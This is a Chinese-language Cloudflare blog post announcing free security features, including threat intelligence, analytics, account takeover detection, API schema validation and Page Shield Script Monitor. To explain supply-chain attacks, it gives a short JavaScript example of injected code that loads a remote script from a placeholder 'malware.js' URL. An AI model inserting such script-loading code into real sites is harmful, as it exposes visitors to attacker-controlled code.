订阅以接收新文章的通知:

Cloudflare 让互联网更安全:免费威胁情报、分析和新型威胁检测

2024-09-24

10 分钟阅读时间
这篇博文也有 EnglishFrançaisDeutsch日本語한국어Español繁體中文版本。

使用互联网的任何人每天都可能会接触 Cloudflare 的网络,要么使用我们的 1.1.1.1 解析器访问受 Cloudflare 保护的站点,要么通过使用我们的 Cloudflare One 产品的网络进行连接。

因此 Cloudflare 承担着巨大的责任,就是让全球数十亿用户的互联网更加安全。今天,我们向所有客户免费提供威胁情报和 10 多种新的安全功能。无论是使用 Cloudflare 来保护自己的网站、家庭网络还是办公室,您都会发现一些有用的功能,只需几次点击就能开始使用。 这些功能专注于解决网络安全中一些日益增长的最大问题,包括帐户接管攻击供应链攻击针对 API 端点的攻击网络可见性以及网络数据泄漏

为每个人提供更多安全保障

您可以在以下各部分中阅读有关每个功能的更多信息,但我们想提前提供一个简短的摘要。

如果您是网络安全爱好者:可以访问我们全新的 Cloudforce One 威胁情报网站,了解威胁行为者、攻击活动和其他涉及整个互联网的安全问题。

如果您是网站所有者 :从今天开始,所有 Free 计划都可以访问其区域的安全分析 。此外,我们还通过 GraphQL 向所有人提供 DNS 分析

获得可见性后,只需要将好的流量与恶意流量区分开来。所有客户都可以使用始终开启的帐户接管攻击检测API 模式验证(用于对其 API 端点上实施积极的安全模型),以及 Page Shield 脚本监控器,来提供对您正在加载的第三方资源(可能被用于执行基于供应链的攻击)的可见性。

如果您使用 Cloudflare 来保护您的人员和网络 :我们将把一些 Cloudflare One 产品捆绑到一个新的免费产品中。捆绑包中将包括我们目前免费提供的 Zero Trust 产品 ,以及一些新产品,例如 Magic Network Monitoring(提供网络可见性)、数据丢失防护(保护敏感数据)以及 Digital Experience Monitoring(衡量网络连接和性能) 。 Cloudflare 唯一提供同类产品免费版本的供应商。

如果您是新用户:我们提供新的身份验证选项。今天开始,我们将推出使用 Google 身份验证来注册和登录 Cloudflare 的选项,这将使我们的一些客户更容易登录,并且减少对记住密码的依赖,从而降低其 Cloudflare 帐户被盗用的风险。

现在我们详细介绍一下:

威胁情报与分析

Cloudforce One

我们的威胁研究和运营团队 Cloudforce One 很高兴地宣布推出一个可免费访问的专用威胁情报网站。我们将通过这个网站发布关于最新威胁行为者活动和策略的技术和管理信息,以及关于新兴恶意软件、漏洞和攻击的见解。

我们还将发布两则新的威胁情报,并承诺发布更多威胁情报。欢迎访问新网站以查看最新研究报告,该研究报告涵盖了一个持续存在的针对南亚和东亚地区组织的政府联盟行为者,以及双重经纪货运欺诈的兴起。 订阅以接收有关未来威胁研究的电子邮件通知。

安全分析

安全分析为您提供了覆盖所有 HTTP 流量(而不仅仅是被缓解的请求)的安全视角,让您能够专注于最重要的事情:被视为恶意但可能未被缓解的流量。这意味着,除了使用安全事件查看我们的应用安全产品套件所采取的安全措施外,您还可以使用安全分析来审查所有流量中的异常或奇怪行为,然后利用获得的见解制定基于特定流量模式的精确缓解规则。从今天开始,我们将向所有计划的客户提供这一视角。 Free 和 Pro 计划用户现在可以访问安全分析的新仪表板,您可以在流量分析图表中查看流量的高级别概述,包括分组和过滤能力,以便您可以轻松关注异常情况。您还可以查看重要统计数据,并从多个维度进行筛选,包括国家/地区、源浏览器、源操作系统、HTTP 版本、 SSL 协议版本、缓存状态和安全操作。

DNS 分析

现在,Cloudflare 的每位用户都可以访问经过改进的新 DNS 分析仪表板 ,还可以通过我们强大的 GraphQL API 访问新的 DNS 分析数据集。现在,您可以轻松分析对您的域进行的 DNS 查询,这可用于排除问题、检测模式和趋势,或通过应用强大的过滤器和按来源分类 DNS 查询来生成使用情况报告。 随着 Foundation DNS 推出,我们引入了基于 GraphQL 的新 DNS Analytics,但这些分析之前仅适用于使用高级域名服务器的区域。然而,由于这些分析提供了深入的洞察,我们认为这项功能应该向所有人提供。从今天开始,基于 GraphQL 的新 DNS 分析可以在使用 Cloudflare 的权威 DNS 服务的每个区域的 DNS 部分的分析界面中访问。

应用威胁检测和缓解

帐户接管检测

65% 的互联网用户因密码重用和大规模数据泄露频率上升而面临帐户接管(ATO)风险。帮助构建一个更好的互联网意味着让每个人都能轻松获得关键的帐户保护。

从今天开始,我们将免费向所有人——从个人用户到大型企业——提供预防凭据填充和其他 ATO 攻击的强大帐户安全服务,并免费提供“泄露凭据检查”和 ATO 检测等增强功能。 

这些更新包括自动检测登录,只需最少设置的暴力攻击预防,以及拥有超过 150 亿条密码的综合泄露凭据数据库,其中将包含来自 Have I Been Pwned (HIBP) 服务的泄露密码以及我们自己的数据库。客户可以通过 Cloudflare 的 WAF 功能对泄露的凭据请求采取行动,例如速率限制规则自定义规则,或者可以在源站采取行动,实施多因素身份验证 (MFA) 或根据发送到源的标头要求重置密码。

设置很简单: Free 计划用户可以获得自动检测,而付费用户可以在 Cloudflare 仪表板中一键激活新功能。有关设置和配置的更多详细信息,请参阅我们的文档并立即使用它!

API 模式验证

API 流量占 Cloudflare 网络上动态流量的一半以上。API 的流行开启了一种全新的攻击手段。面对这些新威胁,Cloudflare API Shield 的模式验证加强 API 安全的第一步。

这是有史以来第一次,任何 Cloudflare 客户都可以使用模式验证,确保仅有效的 API 请求才能到达源服务器。

此功能可以阻止缺陷导致的意外信息泄露,预防开发人员通过非标准流程以有害方式暴露端点,并自动阻止僵尸 API(因为您的 API 清单作为您的 CI/CD 流程的一部分保持最新状态)。

我们建议您使用 Cloudflare 的 API 或 Terraform 提供者将端点添加到 Cloudflare API Shield,并更新模式,作为您的代码构建后 CI/CD 流程的一部分后进行。通过这种方式, API Shield 就会成为一个现成的 API 清单工具,而模式验证将处理对您的 API 发出的任何非预期请求。

虽然 API 都是为了与第三方集成,但有时集成是通过将库直接加载到您的应用中来完成的。接下来,我们将保护用户免受恶意第三方脚本从您网页输入中窃取敏感信息的侵害,从而帮助保护更多网络。

供应链攻击防护

现代 Web 应用通过使用第三方 JavaScript 库来改善用户体验并减少开发人员的时间。由于拥有对页面上一切内容的特权访问权限,遭到破坏的第三方 JavaScript 库可以在最终用户或网站管理员毫不察觉的情况下,秘密地将敏感信息泄露给攻击者。 为应对这种威胁,我们在三年前推出了 Page Shield 。我们现在向所有用户免费提供 Page Shield 的 Script Monitor(脚本监测器)。

使用 Script Monitor,您将看到页面上加载的所有 JavaScript 资源,而不仅仅是您的开发人员包含的那些资源。这种可见性包括由其他脚本动态加载的脚本。一旦攻击者攻陷了某个库,添加一个新的恶意脚本变得非常简单,无需更改原始 HTML 上下文,而是在现有的 JavaScript 资源中包含新代码:

// Original library code (trusted)
function someLibraryFunction() {
    // useful functionality here
}

// Malicious code added by the attacker
let malScript = document.createElement('script');
malScript.src = 'https://example.com/malware.js';
document.body.appendChild(malScript);

有关 pollyfill.io 库所有权变更的消息传出时,Script Monitor 发挥了至关重要的作用。Script Monitor 的用户可以立即看到他们网站上加载的脚本,快速轻松地了解他们是否处于风险之中 

我们很高兴通过向所有客户提供 Script Monitor,从而尽可能扩展这些脚本的可见性。您可以在此处的文档中了解如何开始。 Page Shield 的现有用户可以立即过滤受监控的数据,了解他们的应用是否使用了 polyfill.io (或任何其他库)。此外,我们构建了一个 polyfill.io 重写以响应遭到入侵的服务,并于 2024 年 6 月为 Free 计划自动启用。

Turnstile 作为 Google Firebase 扩展

我们很高兴地宣布推出适用于 Google Firebase 的 Cloudflare Turnstile App Check Provider,提供无需手动设置的无缝集成。这个新的扩展允许在 Firebase 上构建移动或网络应用的开发人员,以使用 Cloudflare 的 CAPTCHA 替代方案来保护其项目免受机器人的侵害。通过利用 Turnstile 的机器人检测和质询功能,您可以确保只有真实的人类访问者与您的 Firebase 后端服务交互,从而增强安全性和用户体验。 Cloudflare Turnstile 是一种注重隐私的 CAPTCHA 替代品,可以在不影响用户体验的情况下区分人类和机器人。与用户经常会放弃的传统 CAPTCHA 解决方案不同, Turnstile是隐形运行的,并提供各种模式来确保无摩擦的用户交互。

Turnstile 的 Firebase App Check 扩展易于集成,使开发人员能够以最少的配置快速提升应用安全性。此扩展也可免费通过 Turnstile 的免费计划无限使用。通过结合 Google Firebase 的后端服务和 Cloudflare Turnstile 的优势,开发人员可以为其用户提供安全和无缝的体验。 

Cloudflare One

Cloudflare One 是一个全面的安全访问服务边缘 (SASE) 平台,旨在保护和连接互联网上的人员、应用、设备和网络。它将 Zero Trust 网络访问 (ZTNA)、安全 Web 网关 (SWG) 等服务整合到单一解决方案中。 Cloudflare One 可以帮助每个人保护人员和网络,管理访问控制,防范网络威胁,保护数据,通过 Cloudflare 的全球网络路由网络流量,从而提高网络性能。它通过提供基于云的方法来取代传统的安全措施,以保护和简化对企业资源的访问。

现在,人人都可以免费使用 Cloudflare One 过去两年来新增的四款产品:

这是对 Cloudflare One 平台现有网络安全产品的补充:

  • Access,用于验证用户身份,只允许他们使用应该使用的应用。

  • Gateway,用于保护出站前往公共互联网和进入您的专用网络的网络流量。

  • Cloudflare Tunnel,我们的应用连接器,其中包括 cloudflared 和 WARP Connector,用于将不同的应用、服务器和专用网络连接到 Cloudflare 网络。

  • Cloudflare WARP,我们的设备代理,用于安全地从笔记本电脑或移动设备向互联网发送流量。

任何拥有 Cloudflare 帐户的人都将自动获得 50 个免费席位,可以使用其 Cloudflare One 组织中的所有产品。请访问我们的 Zero Trust 和 SASE 计划页面,进一步了解我们的免费产品,并了解我们面向 50 名成员以上团队的随用随付和合约计划。

使用 Google 进行身份验证

Cloudflare 仪表板本身已成为一种需要保护的重要资源,我们花费了大量时间确保 Cloudflare 用户帐户不会遭到入侵。

为此,我们通过添加额外的身份验证方法来提高安全性,包括基于应用的双因素身份验证(2FA)、通行密钥、SSO 和使用 Apple 登录。今天,我们增加了使用 Google 帐户注册和登录的能力。 

Cloudflare 支持多种针对不同用例定制的身份验证流程。虽然 SSO 和通行密钥是首选且最安全的身份验证方法,但我们认为提供比密码更强的身份验证因素将填补一个空白,并提高用户的整体平均安全性。使用 Google 登录使用户变得更轻松,并且可以避免他们在已经使用 Google 身份浏览网络时还需要记住另一个密码。 

“使用 Google 登录”基于 OAuth 2.0 规范,并允许 Google 安全地共享有关特定身份的识别信息,同时确保是由 Google 提供此信息,从而防止任何恶意实体冒充 Google。

这意味着,我们可以将身份验证委托给 Google,防止直接针对该 Cloudflare 身份的零知识攻击。

进入 Cloudflare 登录页面后,您将看到如下按钮。点击按钮即可注册 Cloudflare,完成注册后,您无需输入密码即可使用您在 Google 帐户中设置的任何现有保护措施登录。

随着这一能力推出, Cloudflare 现在使用自己的 Cloudflare Workers 为与 OIDC 兼容的身份提供商(例如 GitHub 和 Microsoft 帐户)提供一个抽象层,这意味着我们的用户可以期待在未来看到更多身份提供商 (IdP) 连接支持。

目前,只有通过 Google 注册的新客户才能使用他们的 Google 帐户登录,但我们将为更多用户实现这一功能,包括链接/取消链接社交登录提供商,我们还会添加更多社交登录方式。目前,现有 SSO 设置的企业用户无法使用这种方法,而基于 Google Workspace 的现有 SSO 设置用户将被引导至他们的 SSO 登录流程。我们正在考虑如何简化已设置的 Access 和 IdP 策略,以保护您的 Cloudflare 环境。

如果您未使用过 Cloudflare,并且拥有 Google 帐户,那么使用 Cloudflare 来保护你的网站、构建新服务或尝试 Cloudflare 提供的其他服务将变得比以往任何时候更简单。

更安全的互联网

Cloudflare的目标之一是让网络安全工具大众化,让每个人都能安全地提供内容和连接到互联网,即使并不拥有大型企业组织的资源。

我们决定向所有 Cloudflare 用户免费提供大量新功能,涵盖广泛的安全使用案例,适用于 Web 管理员、网络管理员和网络安全爱好者。

登录您的 Cloudflare 帐户,立即开始享受这些公告提供的优势。欢迎在我们的社区论坛上提供反馈。我们致力于改进现有功能,并在未来推出新功能。

在 Cloudflare TV 上观看

我们保护整个企业网络,帮助客户高效构建互联网规模的应用程序,加速任何网站或互联网应用程序抵御 DDoS 攻击,防止黑客入侵,并能协助您实现 Zero Trust 的过程

从任何设备访问 1.1.1.1,以开始使用我们的免费应用程序,帮助您更快、更安全地访问互联网。要进一步了解我们帮助构建更美好互联网的使命,请从这里开始。如果您正在寻找新的职业方向,请查看我们的空缺职位
Birthday Week安全性CASBDLPData Loss PreventionThreat IntelligenceZero TrustCloudflare OnePage ShieldLeaked Credential ChecksSASE

在 X 上关注

Michael Tremante|@MichaelTremante
Reid Tatoris|@reidtatoris
Cloudflare|@cloudflare

相关帖子

2024年10月23日 13:00

Fearless SSH: short-lived certificates bring Zero Trust to infrastructure

Access for Infrastructure, BastionZero’s integration into Cloudflare One, will enable organizations to apply Zero Trust controls to their servers, databases, Kubernetes clusters, and more. Today we’re announcing short-lived SSH access as the first available feature of this integration. ...